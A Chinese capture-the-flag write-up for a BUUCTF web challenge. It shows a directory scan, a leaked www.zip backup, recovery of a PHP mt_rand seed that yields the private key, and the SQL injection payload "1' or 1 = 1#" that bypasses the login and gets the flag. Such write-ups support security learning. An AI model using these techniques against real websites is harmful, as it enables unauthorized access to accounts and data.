进入网站
获得源码
看到熟悉的网页模板想到了敏感文档泄露和用户信息查询
点击全部链接,尝试输入邮箱发现不是。
完事以后测试其他文件泄露,尝试进行目录遍历,跑脚本
python dirsearch.py -u http://77936295-dc14-466d-9fe7-6cdc5a55a916.node3.buuoj.cn/ -e * --threads=1
发现无论多小的线程速度都会产生429状态码
原来是服务器限制了访问的频率,猜测和BUUCTF服务器有关系。
只能进行手工检测
发现在www.zip处存在文件下载漏洞,得到index.php源码
审计
源码index.php
<?php
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
$username = $_POST['username'];
$password = $_POST['password'];
$Private_key = $_POST['Private_key'];
if (($username == '') || ($password == '') ||($Private_key == '')) {
// 若为空,视为未填写,提示错误,并3秒后返回登录界面
header('refresh:2; url=login.html');
echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
exit;
}
else if($Private_key != '*************' )
{
header('refresh:2; url=login.html');
echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
exit;
}
else{
if($Private_key === '************'){
$getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';';
$link=mysql_connect("localhost","root","root");
mysql_select_db("test",$link);
$result = mysql_query($getuser);
while($row=mysql_fetch_assoc($result)){
echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
}
}
}
}
// genarate public_key
function public_key($length = 16) {
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = '';
for ( $i = 0; $i < $length; $i++ )
$public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
return $public_key;
}
//genarate private_key
function private_key($length = 12) {
$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$private_key = '';
for ( $i = 0; $i < $length; $i++ )
$private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
return $private_key;
}
$Public_key = public_key();
//$Public_key = KVQP0LdJKRaV3n9D how to get crispr's private_key???
看到了php代码中有登陆相关的传参,说明有一个登陆页面调用了index.php,尝试访问login.html,可以看到登陆界面,并且需要密码和私钥。
解决私钥问题
//$Public_key = KVQP0LdJKRaV3n9D how to get crispr's private_key???
审计PHP代码发现$Public_key = KVQP0LdJKRaV3n9D,可以借此得到该PHP代码使用的随机数种子
解题:
1.将公钥转化为种子爆破脚本参数
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2 = 'KVQP0LdJKRaV3n9D'
str3 = str1[::-1]
length = len(str2)
res = ''
for i in range(len(str2)):
for j in range(len(str1)):
if str2[i] == str1[j]:
res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
break
print(res)
//36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61
2.爆破随机数种子
可以确定为5.2.1+版本下的种子库,种子名为1775196155
3.构造输出公钥私钥的PHP脚本
在php5.6.9运行PHP脚本
<?php
mt_srand(1775196155);
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = '';
for ( $i = 0; $i < 16; $i++ )
$public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
echo $public_key;
echo "\n";
$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$private_key = '';
for ( $i = 0; $i < 12; $i++ )
$private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
echo $private_key;
//KVQP0LdJKRaV3n9D XuNhoueCDCGc
公钥与原来的一致,由此知道私钥正确:XuNhoueCDCGc
4.登录
$getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';';
//核心:SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'
构造SQL绕过字符串
1' or 1 = 1#
POST传参,直接用#就可以了,不用%23
5.得到flag
flag{4f196edb-b1d5-4691-83ea-28d7309924bf}